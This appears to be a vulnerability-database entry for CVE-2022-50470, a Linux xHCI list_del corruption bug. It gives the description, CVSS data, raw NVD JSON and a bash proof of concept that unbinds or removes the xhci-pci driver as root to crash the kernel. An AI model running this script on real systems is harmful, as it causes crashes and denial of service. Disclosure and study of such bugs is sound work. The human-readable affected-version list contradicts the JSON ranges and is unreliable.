Security Vulnerability Report
CVE-2022-50470 CVSS 7.8 HIGH

Published: 2025-10-04 16:15:42
Last Modified: 2026-01-23 16:37:44
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

xhci: Remove device endpoints from bandwidth list when freeing the device

Endpoints are normally deleted from the bandwidth list when they are dropped, before the virt device is freed.

If xHC host is dying or being removed then the endpoints aren't dropped cleanly due to functions returning early to avoid interacting with a non-accessible host controller.

So check and delete endpoints that are still on the bandwidth list when freeing the virt device.

Solves a list_del corruption kernel crash when unbinding xhci-pci, caused by xhci_mem_cleanup() when it later tried to delete already freed endpoints from the bandwidth list.

This only affects hosts that use software bandwidth checking, which currently is only the xHC in Intel Panther Point PCH (Ivy Bridge).

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.4.232
Linux Kernel 5.5.x - 5.10.x (confirm against the specific patch version)
Linux Kernel 5.15.x - 5.19.x (confirm against the specific patch version)
Linux Kernel 6.0.x+ (confirm against the specific patch version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2022-50470 PoC - Trigger list_del corruption in xHCI driver
# Affected: Linux kernel with Intel Panther Point PCH (Ivy Bridge) xHCI
# This PoC triggers the vulnerability by unbinding xhci-pci driver
# while endpoints are still on the bandwidth list.

# Check if running as root (required for driver manipulation)
if [ "$EUID" -ne 0 ]; then
    echo "This PoC requires root privileges"
    exit 1
fi

# Step 1: Verify Intel Panther Point PCH (Ivy Bridge) xHCI controller
# Check for the specific Intel xHCI device (PCI ID 8086:1e31).
# lspci prints numeric vendor:device IDs only with -n/-nn, so use -nn here.
echo "[*] Checking for Intel Panther Point PCH xHCI controller..."
if lspci -nn | grep -qi "8086:1e31"; then
    echo "[+] Vulnerable xHCI controller detected"
else
    echo "[-] Vulnerable controller not found, this may not work"
fi

# Step 2: Ensure there are USB devices connected to trigger endpoint allocation
# The vulnerability requires endpoints to be on the bandwidth list
echo "[*] Ensure USB devices are connected to allocate bandwidth endpoints"
lsusb

# Step 3: Unbind xhci-pci to trigger the vulnerability
# This will cause xhci_mem_cleanup() to attempt deleting freed endpoints
echo "[*] Triggering vulnerability by unbinding xhci-pci..."
echo "0000:00:14.0" > /sys/bus/pci/drivers/xhci_pci/unbind 2>/dev/null
if [ $? -eq 0 ]; then
    echo "[+] xhci-pci unbound successfully"
    echo "[*] Check dmesg for list_del corruption crash"
    dmesg | tail -20
else
    echo "[-] Failed to unbind, trying alternative method..."
    # Alternative: use modprobe to remove the module
    modprobe -r xhci_pci 2>/dev/null
    if [ $? -eq 0 ]; then
        echo "[+] xhci_pci module removed"
    else
        echo "[-] Module removal failed - module may be in use"
    fi
fi

# Step 4: Rebind to restore functionality (if system survives)
sleep 2
echo "0000:00:14.0" > /sys/bus/pci/drivers/xhci_pci/bind 2>/dev/null
echo "[*] PoC execution completed"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50470", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:42.380", "lastModified": "2026-01-23T16:37:44.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxhci: Remove device endpoints from bandwidth list when freeing the device\n\nEndpoints are normally deleted from the bandwidth list when they are\ndropped, before the virt device is freed.\n\nIf xHC host is dying or being removed then the endpoints aren't dropped\ncleanly due to functions returning early to avoid interacting with a\nnon-accessible host controller.\n\nSo check and delete endpoints that are still on the bandwidth list when\nfreeing the virt device.\n\nSolves a list_del corruption kernel crash when unbinding xhci-pci,\ncaused by xhci_mem_cleanup() when it later tried to delete already freed\nendpoints from the bandwidth list.\n\nThis only affects hosts that use software bandwidth checking, which\ncurrenty is only the xHC in intel Panther Point PCH (Ivy Bridge)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2", "versionEndExcluding": "4.9.332", "matchCriteriaId": 
"3DE2F2C8-204B-4A2E-BBAA-90AD498BBF94"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.298", "matchCriteriaId": "7140B9A2-EB63-497C-96B1-68A96CD99051"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.264", "matchCriteriaId": "8AE23A9F-BF98-4055-AA49-02118B96226D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.223", "matchCriteriaId": "7FE3F72A-5992-4ABB-A961-F834281060A9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.153", "matchCriteriaId": "62052E35-0E91-4164-BB92-83270CEA0113"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.77", "matchCriteriaId": "756161DE-EFE3-4008-964A-DFE360B188B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.7", "matchCriteriaId": "65D387F0-209C-4EAD-98BA-C4B430A840C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "17F0B248-42CF-4AE6-A469-BB1BAE7F4705"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3bf860a41e0f2fcea0ac3aae8f7ef887a7994b70", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5aed5b7c2430ce318a8e62f752f181e66f0d1053", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5e4ce28ad907aa54f13b21d5f1dc490525957b0c", 
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/678d2cc2041cc6ce05030852dce9ad42719abcfc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8f1cd9633d1f21efc13e8fc75be8f2b6bb85e38c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c892a81c7424b4f6a660cb9c249d354ccf3afeca", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cebbc8d335d6bcc1316584f779c08f80287c6af8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f0de39474078adef6ece7a183e34c15ce2c1d8d1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}